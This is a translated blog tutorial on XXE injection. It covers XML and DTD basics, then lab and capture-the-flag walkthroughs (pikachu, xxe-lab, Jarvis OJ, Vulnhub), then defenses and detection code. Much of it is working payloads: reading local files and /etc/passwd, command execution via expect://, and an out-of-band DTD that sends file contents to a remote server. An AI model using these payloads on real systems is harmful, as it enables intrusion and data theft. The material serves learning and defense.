XXE&XML exploit detection bypass

Table of contents

XML explanation

exploit

xxe-lab shooting range login box xml data transmission test-detection discovery

CTF-Jarvis-OJ-Web-XXE security real question reproduction - data request format

CTF-Vulnhub-XXE security test reappearance-detection, utilization, expansion, actual combat

XXE Vulnerability Repair and Defense Solution-php,java,python-filtering and disabling 

XML explanation

XML definition: XML is designed to transmit and store data. An XML document consists of an XML declaration, an optional DTD (document type definition) and the document elements. Its focus is on the content of the data; it separates data from its presentation (HTML) and is a software- and hardware-independent means of transmitting information.

XML vs. HTML:

1. XML is designed to transmit and store data, and the focus is on the content of the data. HTML is designed to display data, and the focus is on how the data looks.

2. XML is designed to transfer information, whereas HTML is designed to display information.

XXE vulnerability

Full name: XML External Entity Injection

The XXE vulnerability occurs when an application parses XML input without having disabled the loading of external entities, so that entities supplied by the attacker (pointing at local files, URLs or other schemes) are resolved by the parser.

What are the hazards:

1. DoS attack

2. SSRF attack

3. Use the file protocol to read arbitrary files

4. Port detection

5. Execute system commands

Which URL schemes an entity can use (file, http, php, expect, ...) depends on the language and XML library; the original post showed a table of them here.

XML typical code

<?xml version="1.0"?> <!-- XML declaration; it must be the first thing in the document -->
<!-- document type definition -->
<!DOCTYPE note [ <!-- declares that this document is of type note -->
<!ELEMENT note (to,from,head,body)> <!-- the note element has four child elements -->
<!ELEMENT to (#PCDATA)> <!-- the to element is of type #PCDATA (parsed character data) -->
<!ELEMENT from (#PCDATA)> <!-- the from element is of type #PCDATA -->
<!ELEMENT head (#PCDATA)> <!-- the head element is of type #PCDATA -->
<!ELEMENT body (#PCDATA)> <!-- the body element is of type #PCDATA -->
]>
<!-- document elements -->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

DTD

The role of a DTD is to define the legal building blocks of an XML document. A DTD can be declared inline in the XML document or referenced from an external file.

Internal DTD declaration: <!DOCTYPE root-element [element declarations]>
External DTD declaration: <!DOCTYPE root-element SYSTEM "filename">, for example <!DOCTYPE note SYSTEM "Note.dtd">
Or: <!DOCTYPE root-element PUBLIC "public_ID" "filename">

exploit

Once an XXE vulnerability is confirmed, there is an input point that accepts XML.

For example: the XXE vulnerability in the pikachu practice range

How to play - read files

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d:/test.txt">
]>
<x>&xxe;</x>

// xxe is the entity name; it reads test.txt through the file protocol, the part after file:// being the file's location
// the file content is then echoed in the output

How to play - intranet probing, or attacking an intranet application (by triggering a vulnerable address)

Rarely encountered in real applications.

Can determine whether a file exists on the other host, and whether a port is open.

Prerequisites

  • an intranet IP address
  • an open port
  • an XXE vulnerability
  • a constructed vulnerable address
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.80.1:80/test.txt" >
]>
<x>&rabbit;</x>


// the target here should be a file, not just a site URL

How to play - RCE

This case executes a system command; it only works in a PHP environment where the expect extension is installed.

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://id" >
]>
<x>&xxe;</x>

How to play - import external entity DTD

<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:80/evil2.dtd">
%file;
]>
<x>&send;</x>


// contents of evil2.dtd

<!ENTITY send SYSTEM "file:///d:/test.txt">

Relationship to echo

In the previous examples, the results were echoed back in the response.

No echo - read file (local environment test)

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:80/evil2.dtd">
%dtd;
%send;
]>

evil2.dtd

<!ENTITY % payload
"<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1:80/?data=%file;'>"
>
%payload;

// This is equivalent to reading the file and sending it to the server at the address you specified, so the log entry appears in that server's log

Open the code of the pikachu range's XXE page; by default it is vul\xxe\xxe_1.php

Temporarily comment out the part marked by the arrow (the part that echoes the parsed result), which is equivalent to having no echo

Open the Apache configuration file httpd.conf and remove the comment in front of the CustomLog line

Enable log_config_module in the PHP environment's extension settings

Open the access.log file

Base64-decode the logged value 5oiR54ix5ZCD55OcIQ== to recover the text content

Remove the comment added above

Use: make the other party's parser visit your website, and read the generated log entry
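From the defender's side, the out-of-band flow above leaves two outbound requests from the application server: one fetching the remote DTD, then one carrying the file contents in a query parameter. The following added example (my code, not part of the original post or of the pikachu project) scans egress-proxy log lines in Apache combined format for exactly those two signs. The log lines, hosts and the base64 value are constructed for the example, and the egress proxy that would produce such a log is an assumption.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Constructed egress-proxy log lines (Apache combined format), as if the app
# server 10.0.0.5 had been logged while its XML parser fetched remote
# resources. Hosts, paths and the base64 value are made up for this example.
SAMPLE_EGRESS_LOG = """\
10.0.0.5 - - [22/Aug/2022:10:01:02 +0800] "GET http://203.0.113.10/evil2.dtd HTTP/1.1" 200 123 "-" "-"
10.0.0.5 - - [22/Aug/2022:10:01:03 +0800] "GET http://203.0.113.10/?data=c2FtcGxlIGZpbGUgY29udGVudHM= HTTP/1.1" 200 0 "-" "-"
10.0.0.5 - - [22/Aug/2022:10:05:00 +0800] "GET http://203.0.113.20/api/status?verbose=1 HTTP/1.1" 200 512 "-" "curl/7.81"
"""

# client ip, timestamp, method, URL and status from a combined-format line
_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)
# a query value that looks like a base64 blob of non-trivial length
_B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decode_base64_blob(value):
    """Return the decoded text if value is a plausible base64 blob, else None."""
    if not _B64_RE.fullmatch(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def find_oob_xxe_events(log_text):
    """Flag outbound DTD fetches and base64-carrying query parameters."""
    events = []
    for line in log_text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        parts = urlsplit(url)
        if parts.path.lower().endswith(".dtd"):
            events.append({"ip": m.group("ip"), "url": url,
                           "reason": "fetched a remote DTD"})
        # split the query by hand: parse_qs would turn a literal '+' inside a
        # base64 blob into a space and break the decode
        for pair in parts.query.split("&"):
            if not pair:
                continue
            name, _, value = pair.partition("=")
            decoded = _decode_base64_blob(value)
            if decoded is not None:
                events.append({"ip": m.group("ip"), "url": url,
                               "reason": f"base64 blob in query parameter '{name}'",
                               "decoded": decoded})
    return events


if __name__ == "__main__":
    for event in find_oob_xxe_events(SAMPLE_EGRESS_LOG):
        print(event)
```

Either sign on its own is worth an alert when the source is a host that parses untrusted XML; a .dtd fetch followed within seconds by a request with a large opaque parameter to the same external host is the pattern of the payload shown above.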

protocol - read file (bypass)

Reference article: CTF XXE - MustaphaMond - Blog Garden (XML explanation, bypasses, etc.)

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>
<x>&f;</x>

xxe-lab shooting range login box xml data transmission test-detection discovery

Shooting range download address: https://github.com/c0ny1/xxe-lab

Example: php-xxe

How to detect: (capture with Burp, send to the spider, enter a keyword, crawl and inspect) look for requests whose MIME type is XML

1. Data format: an XML-shaped body such as <user>test</user><pass>Mikasa</pass> is found. If values are echoed, test by entering a tag and checking whether the corresponding value comes back, e.g. <aa>dsdd</aa>, and see whether dsdd is echoed

2. Capture the packet and find that the Content-Type is text/xml or application/xml

3. Change the Content-Type value and look at the return value

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/test.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

CTF-Jarvis-OJ-Web-XXE security real question reproduction - data request format

Change the Content-Type value and look at the return value. In the original request the Content-Type is application/json; change it to application/xml

http://web.jarvisoj.com:9882/

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>

CTF-Vulnhub-XXE security test reappearance-detection, utilization, expansion, actual combat

Scan IP and ports -> scan and probe directories -> capture packets and probe for XXE -> use XXE to read source code -> the flag file points to another file -> base32 then base64 decoding -> run the PHP -> flag

Download address: https://download.vulnhub.com/xxe/XXE.zip

Download, decompress and import the .ovf file into VMware

(1) As shown in the figure, the state of the environment after setup is unknown for the time being

(2) On the attack machine (Kali), check the IP


(3) Use nmap to scan the network segment, find the suspicious IP and find that port 80 is open

(4) The browser tries to access it and succeeds

(5) Use the Kali tool dirsearch to scan the website's directories and find the sensitive file robots.txt

Download and use: install the dirsearch tool on Kali and run

python3 dirsearch.py -u http://192.168.80.128 -e*

(6) Visit 192.168.159.223/robots.txt, find two more sensitive files, and visit them in turn


admin.php

Judging from the results of the accesses above, the xxe page can be accessed, but access to admin.php fails even though the file exists, which must be tricky; let's first look at the xxe page

1. Capture the packet with Burp

2. Construct the payload and successfully verify that there is an XXE injection vulnerability

3. Because admin.php exists in the previous scan but cannot be accessed, we can use the XXE injection here to read admin.php. The payload is shown below, and the source code of admin.php is successfully read

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE 	ANY [
<!ENTITY name SYSTEM "php://filter/read/convert.base64-encode/resource=admin.php">
]>
<root><name>&name;</name><password>1</password></root>

// the benefit of using php://filter/read/convert.base64-encode/resource=admin.php is that you don't need to know the file's full directory path

4. Base64-decode the result

5. From the PHP source code you can find another sensitive file, and you can log in with the obtained account administhebest and its password. The password is stored as an MD5 hash, which decodes to admin@123

6. Try to log in at /xxe/admin.php and click the flag

Because Burp found it under the xxe directory when capturing packets, use xxe/admin.php when logging in

7. Finally get the flag page; access fails again, so use XML injection to get the source code again, as shown in the figure

Base64-decode it

On inspection, the encoding here is base32, so base32 decoding is used first, then base64 decoding, and finally the path containing the flag is obtained

8. Access the path and base64-decode

9. It is written in PHP; run the PHP online to get the flag SAFCSP{xxe_is_so_easy}

xxe Security Vulnerability Automated Injection Script Tool-XXEinjector(Ruby)

https://github.com/enjoiz/XXEinjector

XXEinjector: A powerful automated XXE injection tool - bmjoker - 博客园

XXE Vulnerability Repair and Defense Solution-php,java,python-filtering and disabling 

Method 1: Disable external entities

PHP:
// deprecated since PHP 8.0, where external entity loading is already disabled by default
libxml_disable_entity_loader(true);

Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
// setExpandEntityReferences alone is not enough on most JAXP parsers; also refuse DTDs entirely
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Python:
from lxml import etree
# resolve_entities=False stops entity expansion; no_network=True additionally blocks remote DTD/entity fetches
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False, no_network=True))

Method 2: Filter XML data submitted by users

Filter the keywords <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC
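Both methods above, as an added example in Python (my code, not from the original post or any of the projects it mentions); it also covers the detection step from the xxe-lab section, since the same keyword check applies to a captured request body. Method 1 is shown as a parser that refuses any DOCTYPE or external entity before anything is expanded, using only the standard-library expat binding; Method 2 is the keyword filter over the raw request body. The sample documents are constructed, the first modelled on the login-box payload from the xxe-lab section. Two caveats a practitioner should keep in mind: the keyword filter only sees the raw bytes it is handed, so it is a secondary control behind disabling DTD processing in the parser itself; and the stdlib xml.etree parser skips external entities but still expands internal ones, which is why the example goes down to the expat handlers.

```python
import re
import xml.parsers.expat as expat

# Constructed samples. The first mirrors the shape of the login-box payload
# on the page (an entity pointing at a local file); the second is a normal
# login document without any DTD.
XXE_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/test.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>"""

BENIGN_SAMPLE = """<?xml version="1.0"?>
<user><username>test</username><password>Mikasa</password></user>"""


class XxeBlocked(Exception):
    """Raised when a document tries to use a DTD or an external entity."""


# Method 2: keyword filtering. SYSTEM/PUBLIC only count when they appear
# inside a <! ... > declaration, so element text containing the word
# "public" is not flagged.
_DECL_RE = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
_IDENT_RE = re.compile(r"<![^>]*?\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def find_xxe_indicators(xml_text):
    """Return the sorted set of DTD keywords present in the raw request body."""
    found = {m.upper() for m in _DECL_RE.findall(xml_text)}
    found |= {m.upper() for m in _IDENT_RE.findall(xml_text)}
    return sorted(found)


# Method 1: refuse DTD and entity handling in the parser itself.
def parse_without_dtd(xml_text):
    """Parse a small XML document into {tag: text}, refusing every DTD feature."""
    parser = expat.ParserCreate()
    # never process parameter entities (the %file; / %dtd; style used for
    # out-of-band exfiltration)
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # fires at '<!DOCTYPE', before any entity declaration is read
        raise XxeBlocked(f"DOCTYPE for '{name}' rejected: DTDs are not accepted")

    def reject_external_entity(context, base, system_id, public_id):
        raise XxeBlocked(f"external entity {system_id!r} rejected")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity

    fields = {}
    stack = []  # (tag, [text fragments]) for the open elements

    def start(name, attrs):
        stack.append((name, []))

    def chars(data):
        if stack:
            stack[-1][1].append(data)

    def end(name):
        tag, parts = stack.pop()
        text = "".join(parts).strip()
        if text:
            fields[tag] = text

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return fields


if __name__ == "__main__":
    print("indicators in XXE sample:", find_xxe_indicators(XXE_SAMPLE))
    print("indicators in benign sample:", find_xxe_indicators(BENIGN_SAMPLE))
    print("parsed benign sample:", parse_without_dtd(BENIGN_SAMPLE))
    try:
        parse_without_dtd(XXE_SAMPLE)
    except XxeBlocked as exc:
        print("blocked:", exc)
```

Rejecting the DOCTYPE outright, rather than only external entities, also removes internal-entity expansion (the DoS case listed under hazards) and the parameter-entity tricks used in the no-echo section; a login endpoint like the one in xxe-lab has no legitimate need for a DTD, so the stricter rule costs nothing.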


Reference article: Day 39 - WEB Vulnerabilities - XXE&XML Exploitation Detection Bypass Full Solution_IsecNoob's Blog-CSDN Blog

Vulnhub XXE shooting range reappears_Xianghua Blog-CSDN Blog_xxe Vulnerability Shooting Range


Origin blog.csdn.net/weixin_52221158/article/details/126470235